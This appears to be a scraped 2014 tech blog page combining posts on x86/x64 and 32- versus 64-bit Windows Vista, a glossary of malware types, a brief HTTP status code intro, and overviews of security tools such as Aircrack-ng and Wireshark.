Technically x86 simply refers to a family of
processors and the instruction set they all
use. It doesn't actually say anything specific
about data sizes.
x86 started out as a 16-bit instruction set
for 16-bit processors (the 8086 and 8088
processors), then was extended to a 32-bit
instruction set for 32-bit processors (80386
and 80486), and now has been extended to a
64-bit instruction set for 64-bit processors.
It used to be written as 80x86 to reflect the
changing value in the middle of the chip
model numbers, but somewhere along the
line the 80 in the front was dropped, leaving
just x86.
Blame the Pentium and it's offspring for
changing the way in which processors were
named and marketed, although all newer
processors using Intel's x86 instruction set
are still referred to as x86, i386, or i686
compatible (which means they all use
extensions of the original 8086 instruction
set).
x64 is really the odd man out here. The first
name for the 64-bit extension to the x86 set
was called x86-64. It was later named to
AMD64 (because AMD were the ones to come
up with the 64-bit extension originally). Intel
licensed the 64-bit instruction set and
named their version EM64T. Both instruction
sets and the processors that use them are all
still considered x86.
System requirements
32 bit :- 1-gigahertz (GHz) 32-bit (x86)
processor or 64-bit (x64) processor,512 MB
of RAM
64 bit :- 1-GHz 64-bit (x64) processor, 1 GB
of RAM (4 GB recommended)
Memory access
32 bit :- A 32-bit version of Windows Vista
can access up to 4 GB of RAM.
64 bit :- A 64-bit version of Windows Vista
can access from 1 GB of RAM to more than
128 GB of RAM.
Memory access per edition
32 bit :- All 32-bit versions of Windows Vista
can access up to 4 GB of RAM.
64 bit :- Windows Vista Home Basic – 8 GB
of RAM
Windows Vista Home Premium – 16 GB of
RAM
Windows Vista Business – 128 GB of RAM or
more
Windows Vista Enterprise – 128 GB of RAM
or more
Windows Vista Ultimate – 128 GB of RAM or
more
DEP
32-bit versions of Windows Vista use a
software-based version of DEP.
64-bit versions of Windows Vista support
hardware-backed DEP.
Kernel Patch Protection (PatchGuard)
32 bit :- This feature is not available in 32-
bit versions of Windows Vista.
64 bit : - This feature is available in 64-bit
versions of Windows Vista. Kernel Patch
Protection helps prevent a malicious
program from updating the Windows Vista
kernel. This feature works by helping to
prevent a kernel-mode driver from extending
or replacing other kernel services. Also, this
feature helps prevent third-party programs
from updating (patching) any part of the
kernel.
Driver signing
32-bit versions of Windows Vista support 32-
bit drivers that are designed for Windows
Vista.
64-bit versions of Windows Vista do not
support 32-bit device drivers.
16-bit program support
32-bit versions of Windows Vista support 16-
bit programs, in part.
64-bit versions of Windows Vista do not
support 16-bit programs.
Note:-
If you value the benefits and advantages of
switching and embracing 64-bit Windows
Vista, here’s a few considerations to ponder
before making the move to install x64
Windows Vista:
64-bit device drivers may not be available
for one or more devices in the computer.
Device drivers must be digitally signed.
32-bit device drivers are not supported.
32-bit programs may not be fully compatible
with a 64-bit operating system.
It may be difficult to locate programs that
are written specifically for a 64-bit operating
system.
Not all hardware devices may be compatible
with a 64-bit version of Windows Vista.
Tuesday 12 August 2014
32 bit vs 64 Bit ( For Windows users & System Administrators )
Computer threats Malware, Spyware, Virus, Worm , Bot , Backdoor
Virus – this is a term that used to be generic.
Any bad software used to be a virus;
however, we use the term “malware” now.
We use the word “virus” to describe a
program that self-replicates after hooking
itself onto something running in Windows®.
Worm – a worm is another kind of self-
replicating program but generally doesn’t
hook itself onto a Windows process. Worms
generally are little programs that run in the
background of your system.
Trojan – software that you thought was going
to be one thing, but turns out to be
something bad. Named for the fabled “Trojan
Horse” that appeared to be a gift but in fact
carried a dangerous payload.
Drive-by download – this is probably the
most popular way to get something nasty
into your computer. Most of the time, it
comes from visiting a bad web page. That
web page exploits a weakness in your
browser and causes your system to become
infected.
Malware Actions
Malware:
This is a big catchall phrase that covers all
sorts of software with nasty intent. Not
buggy software, not programs you don’t like,
but software which is specifically written
with the intent to harm.
Once malware is in your computer, it can do
many things. Sometimes it’s only trying to
replicate itself with no harm to anyone, other
times it’s capable of doing very nasty things.
Adware – not truly malware and almost
never delivered using one of the methods
above. Adware is software that uses some
form of advertising delivery system.
Sometimes the way that advertisements are
delivered can be deceptive in that they track
or reveal more information about you than
you would like. Most of the time, you agree
to the adware tracking you when you install
the software that it comes with. Generally, it
can be removed by uninstalling the software
it was attached to.
Spyware – software that monitors your
computer and reveals collected information
to an interested party. This can be benign
when it tracks what webpages you visit; or it
can be incredibly invasive when it monitors
everything you do with your mouse and
keyboard.
Ransomware – lately a very popular way for
Internet criminals to make money. This
malware alters your system in such a way
that you’re unable to get into it normally. It
will then display some kind of screen that
demands some form of payment to have the
computer unlocked. Access to your computer
is literally ransomed by the cyber-criminal.
Scareware – software that appears to be
something legit (usually masquerading as
some tool to help fix your computer) but
when it runs it tells you that your system is
either infected or broken in some way. This
message is generally delivered in a manner
that is meant to frighten you into doing
something. The software claims to be able to
fix your problems if you pay them.
Scareware is also referred to as “rogue”
software – like rogue antivirus.
Bots
"Bot" is derived from the word "robot" and
is an automated process that interacts with
other network services. Bots often automate
tasks and provide information or services
that would otherwise be conducted by a
human being. A typical use of bots is to
gather information (such as web crawlers),
or interact automatically with instant
messaging (IM), Internet Relay Chat (IRC), or
other web interfaces. They may also be used
to interact dynamically with websites.
Bots can be used for either good or
malicious intent. A malicious bot is self-
propagating malware designed to infect a
host and connect back to a central server or
servers that act as a command and control
(C&C) center for an entire network of
compromised devices, or "botnet." With a
botnet, attackers can launch broad-based,
"remote-control," flood-type attacks against
their target(s). In addition to the worm-like
ability to self-propagate, bots can include the
ability to log keystrokes, gather passwords,
capture and analyze packets, gather financial
information, launch DoS attacks, relay spam,
and open back doors on the infected host.
Bots have all the advantages of worms, but
are generally much more versatile in their
infection vector, and are often modified
within hours of publication of a new exploit.
They have been known to exploit back doors
opened by worms and viruses, which allows
them to access networks that have good
perimeter control. Bots rarely announce
their presence with high scan rates, which
damage network infrastructure; instead they
infect networks in a way that escapes
immediate notice.
Exploit
An exploit is a piece of software, a
command, or a methodology that attacks a
particular security vulnerability. Exploits are
not always malicious in intent—they are
sometimes used only as a way of
demonstrating that a vulnerability exists.
However, they are a common component of
malware.
Back Door
A back door is an undocumented way of
accessing a system, bypassing the normal
authentication mechanisms. Some back doors
are placed in the software by the original
programmer and others are placed on
systems through a system compromise, such
as a virus or worm. Usually, attackers use
back doors for easier and continued access
to a system after it has been compromised.
Meaning of HTTP Status Codes
HTTP, Hypertext Transfer Protocol, is the
method by
which clients (i.e. you) and servers
communicate.
When someone clicks a link, types in a URL
or submits
out a form, their browser sends a request to
a server
for information. It might be asking for a
page, or
sending data, but either way, that is called
an HTTP
Request. When a server receives that request,
it sends
back an HTTP Response, with information for
the
client.
Usually, this is invisible, though I'm sure
you've seen
one of the very common Response codes -
404,
indicating a page was not found. There are a
fair few
more status codes sent by servers, and the
following
is a list of the current ones in HTTP 1.1,
along with an
explanation of their meanings.
Acunetix
Acunetix has a free and paid version. This
hacking tool has many uses but in essence it
tests and reports on SQL injection and Cross
Site scripting testing. It has a state of the art
crawler technology which includes a client
script analyzer engine. This security tool
generates detailed reports that identify
security issues and vulnerabilities. The latest
version, Acunetix WVS version 8, includes
several security features such as a new
module that tests slow HTTP Denial of
Service. This latest version also ships with a
compliance report template for ISO 27001.
This is useful for penetration testers and
developers since it allows organizations to
validate that their web applications are ISO
27001 compliant
Aircrack-ng
Aircrack-ng is a comprehensive set of
network security tools that includes,
aircrack-ng (which can cracks WEP and WPA
Dictionary attacks), airdecap-ng (which can
decrypts WEP or WPA encrypted capture
files), airmon-ng (which places network cards
into monitor mode, for example when using
the Alfa Security Scanner with rtl8187),
aireplay-ng (which is a packet injector),
airodump-ng (which is a packet sniffer),
airtun-ng (which allows for virtual tunnel
interfaces), airolib-ng (which stores and
manages ESSID and password lists),
packetforge-ng (which can create encrypted
packets for injection), airbase-ng (which
incorporates techniques for attacking clients)
and airdecloak-ng (which removes WEP
cloaking). Other tools include airdriver-ng (to
manage wireless drivers), airolib-ng (to store
and manages ESSID and password lists and
compute Pairwise Master Keys), airserv-ng
(which allows the penetration tester to
access the wireless card from other
computers). Airolib-ng is similiar to easside-
ng which allows the user to run tools on a
remote computer, easside-ng (permits a
means to communicate to an access point,
without the WEP key), tkiptun-ng (for WPA/
TKIP attacks) and wesside-ng (which an an
automatic tool for recovering wep keys).
Like most of the security tools in our list,
Aircrack also has a GUI interface – called
Gerix Wifi Cracker. Gerix is a freely licensed
security tool under the GNU General Public
License and is bundled within penetration
testing Linux distributions such a kali linux ,
BackTrack And Backbox. The Gerix GUI has
several penetration testing tools that allow
for network analysis, wireless packet
capturing, and SQL packet injection.
Wireshark
Wireshark has been around for ages and is
extremely popular. Wireshark allows the
pentester to put a network interface into a
promiscuous mode and therefore see all
traffic. This tool has many features such as
being able to capture data from live network
connection or read from a file that saved
already-captured packets. Wireshark is able
to read data from a wide variety of
networks, from Ethernet, IEEE 802.11, PPP,
and even loopback. Like most tools in our
2013 Concise Courses Security List the
captured network data can be monitored and
managed via a GUI – which also allows for
plug-ins to be inserted and used. Wireshark
can also capture VoIP packets and raw USB
traffic can also be captured.